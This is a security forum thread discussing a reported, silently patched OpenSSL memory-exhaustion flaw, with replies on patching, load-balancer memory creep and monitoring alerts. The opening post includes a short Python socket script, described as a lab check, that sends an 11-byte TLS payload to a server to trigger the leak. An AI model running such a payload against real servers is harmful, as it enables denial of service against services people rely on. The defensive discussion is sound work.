ForumsExploitsThe HollowByte Incident: 11 Bytes, 131 KB Leaks, and Zero CVEs

The HollowByte Incident: 11 Bytes, 131 KB Leaks, and Zero CVEs

ICS_Security_Tom 7/18/2026 USER

Hey everyone,

Just saw the write-up from Okta's Red Team regarding the "HollowByte" flaw. It’s wild that 11 bytes in a TLS request can force an unpatched OpenSSL server to set aside 131 KB of memory that never gets freed until the process restarts (at least on glibc systems).

The kicker? OpenSSL supposedly patched this in June, but they did it silently—no CVE, no advisory, no changelog entry. This makes asset management a nightmare. If you're relying purely on CVE scanners, you might have missed this entirely.

To check your exposure, you should verify your OpenSSL build date versus the June timeline. Here’s a quick bash snippet to check your current version details:

openssl version -a | grep "built on"


If you’re running an instance built before June 2026, you are potentially exposed to a very efficient DoS vector. I've been testing this in a lab environment using a modified Python socket script to send the anomaly, and the memory exhaustion happens faster than expected.
import socket

# Conceptual check for the 11-byte anomaly
# Payload: 11 bytes triggering the HollowByte reservation
payload = b'\x16\x03\x01\x00\x0b' + b'\x01\x00\x00\x06\x03\x03'

# Target host and port
host = '192.168.1.10'
port = 443

try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.send(payload)
    print("Payload sent, monitor process memory.")
except Exception as e:
    print(f"Socket error: {e}")

How is everyone else handling the lack of a CVE for reporting? Are you treating this as standard maintenance or a critical patch?

FO
Forensics_Dana7/18/2026

This is exactly why I hate opaque patching. We noticed some memory creep on our load balancers last month but assumed it was config drift. Restarting the nginx worker processes fixed it temporarily, but this explains why it kept coming back. I'm pushing an update tonight. Has anyone confirmed if the 1.1.1 branch received the backport or if this is strictly a 3.x issue?

PE
Pentest_Sarah7/18/2026

From a Red Team perspective, this is a low-bar denial-of-service. You don't need a complex exploit chain; just a simple socket script. The lack of a CVE is frustrating because we can't formally report it to clients as a 'vulnerability' with a severity score—they just see it as 'memory optimization' until it crashes the box.

PH
PhishFighter_Amy7/18/2026

We caught this via a memory usage anomaly alert in our monitoring stack. We set up a watch for process.memory.rss spiking on our edge nodes. Without that, we would have been blind. Silent patches really break the standard 'vulnerability management' workflow since the scanners don't flag it.

Verified Access Required

To maintain the integrity of our intelligence feeds, only verified partners and security professionals can post replies.

Request Access

Thread Stats

Created7/18/2026
Last Active7/18/2026
Replies3
Views115